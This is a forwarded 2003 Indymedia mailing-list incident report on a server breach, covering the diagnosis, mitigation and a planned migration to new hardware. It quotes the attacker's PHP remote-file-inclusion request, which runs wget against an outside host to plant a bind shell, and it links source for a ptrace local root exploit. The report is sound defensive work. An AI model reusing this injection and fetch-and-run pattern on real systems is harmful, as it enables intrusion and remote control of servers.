boh magari incuriosisce qlkuno carloz ----- Forwarded message from blicero blicero@ecn.org -----

List-Archive: http://lists.indymedia.org/mailman/public/italy-tech/

----- Forwarded message from jeff jeff@indymedia.org -----

Date: Wed, 2 Apr 2003 12:15:11 +0100 From: jeff jeff@indymedia.org Subject: ahimsa attack details & new server To: admin@ahimsa.solipsists.org Reply-To: jeff@indymedia.org

A successful attack was launched against ahimsa on April 1st. The attacker was able to get a shell, but we do not believe that they were able to get root.

Previous attempts were made against Italy IMC, but it appears they were not successful.

At 07:54:10 the following request was made to Portugal: /index.php?centro=http://infernalis.republika.pl/code.php&com=wget%20http://infernalis.rep...

This copied a shell to /tmp/.bash from the site infernalis.republika.pl which opened TCP port 23456 to allow remote connections.

The attacker then executed the shell and scp/ftp'd two more files to /tmp. (We haven't pinpointed this, but it looks most probable.)

The files were identical and named "ptr" and "ptrace". The source code to these files is here: http://www.securiteam.com/exploits/5CP0Q0U9FY.html

I noticed a high load on ahimsa, ran `top` and saw both the `ptr` and `ptrace` executables taking over CPU. You can see the spike in the graph here (see Tuesday): http://ahimsa.solipsists.org/stats/mrtg/cpu-other.html I killed the processes and the load returned to normal. They had been running for approximately one hour.

The ptr/ptrace exploit should drop a user into a root shell. This did not happen and tests confirm that running the executables drives the load high, but doesn't spawn a root shell.

About a week ago, Matze had been doing some experimenting to find a way to block people from exploiting the ptrace vulnerability. He thought it didn't work, but it actually did. He compiled a new kernel that protects against the ptrace exploit, but I hadn't installed it. His playing with /proc did the trick.

It should be noted that the ptrace vulnerability is a local exploit only. The attacker first had to get a local shell and did that via a PHP exploit on Portugal.

We spent forever figuring all this out. ;)

In the process of all this (especially when we thought they rooted the box) we decided to do a fresh install. We are going to proceed with this just to be certain, and also to upgrade the hardware at the same time (especially disk space). The new server should be brought online in the next 24 hours. Both servers will be running simultaneously. We'll recompile/reinstall what we need then migrate the sites. Each IMC is responsible for their migration, but we'll all be around to help.

The new server is a dual 1.67Ghz Athlon, 3 gigs RAM, 4 x 72 gig hardware RAID level 5 which gives us a bit over 200G of space.

Portugal currently has a template page running which redirects people to www.indymedia.org. When their code is fixed, Portugal can be brought back online. Note that Portugal is running their own code, so this isn't an active, sf-active, dada, or mir exploit.

-Jeff

P.S. I will be gone part of the day on Wednesday as I have a previous commitment. When I finish it, I'll be back online. :)

----- End forwarded message -----